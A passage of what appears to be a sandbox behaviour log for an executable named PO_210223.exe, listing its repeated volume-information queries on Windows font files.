            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\PO_210223.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
